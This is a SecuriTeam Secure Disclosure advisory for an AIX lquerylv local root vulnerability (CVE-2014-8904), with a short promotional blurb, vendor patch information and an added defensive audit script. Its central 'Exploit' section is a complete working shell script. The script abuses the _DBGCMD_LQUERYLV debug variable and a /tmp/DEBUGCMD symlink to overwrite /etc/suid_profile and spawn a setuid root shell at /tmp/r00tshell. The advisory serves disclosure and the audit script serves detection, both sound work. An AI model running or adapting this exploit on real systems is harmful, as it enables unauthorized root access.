SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. Originally released for the IBM 6150 RISC workstation, AIX now supports or has supported a wide variety of hardware platforms, including the IBM RS/6000 series and later POWER and PowerPC-based systems, IBM System i, System/370 mainframes, PS/2 personal computers, and the Apple Network Server.
Vulnerability Details
Running the lquerylv command with the DBGCMD_LQUERYLV variable set may allow a local user to gain root privileges.
Exploit
#!/bin/sh
#
# From file writing to command execution
# Tested on AIX 7.1
#
export _DBGCMD_LQUERYLV=1
umask 0000
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # Any SUID root binaries with execve(), or system()
echo "[!] Remove the /etc/suid_profile!"
/tmp/r00tshell
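Added here as a defender-side check, not part of the SSD advisory or of the exploit above: a POSIX shell audit for the artifacts the exploit depends on (the /tmp/DEBUGCMD symlink, a world-writable /etc/suid_profile, and the exported _DBGCMD_LQUERYLV variable). The ROOT prefix argument, the function names and the finding-count return value are assumptions made for this example so it can be exercised against a scratch directory on a non-AIX host; on the AIX system itself run it with ROOT=/.

```shell
#!/bin/sh
# Added example (not from the original advisory): audit a host for the
# artifacts the lquerylv debug-file write leaves behind. The ROOT prefix
# argument is an assumption for testability; on AIX pass "/".

# Returns 0 when the debug variable that triggers the file write is exported.
lquerylv_debug_env_set() {
    [ -n "${_DBGCMD_LQUERYLV+x}" ]
}

# Prints 'w' if "others" have write permission on $1
# (character 9 of the ls -l mode string is the other-write bit).
other_write_bit() {
    ls -ld "$1" | cut -c9
}

# Audits the tree under $1 for a symlinked /tmp/DEBUGCMD and a tampered
# /etc/suid_profile. Prints each finding; the return status is the
# number of findings (0 means clean).
audit_lquerylv_artifacts() {
    root=${1%/}
    findings=0
    dbg="$root/tmp/DEBUGCMD"
    prof="$root/etc/suid_profile"

    # The exploit plants a symlink here so the privileged debug output
    # is written to a path of the attacker's choosing.
    if [ -L "$dbg" ]; then
        echo "FINDING: $dbg is a symlink -> $(ls -l "$dbg" | sed 's/.* -> //')"
        findings=$((findings + 1))
    fi

    # ksh sources /etc/suid_profile when running setuid; it must never be
    # world-writable, and on a stock system it normally does not exist.
    if [ -e "$prof" ]; then
        echo "NOTICE: $prof exists; review its contents"
        if [ "$(other_write_bit "$prof")" = w ]; then
            echo "FINDING: $prof is world-writable"
            findings=$((findings + 1))
        fi
    fi
    return "$findings"
}
```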
Vendor Response
IBM has released an advisory and a patch for AIX servers: AIX cmdlvm vulnerability.
CVE
One CVE entry has been released for this vulnerability: CVE-2014-8904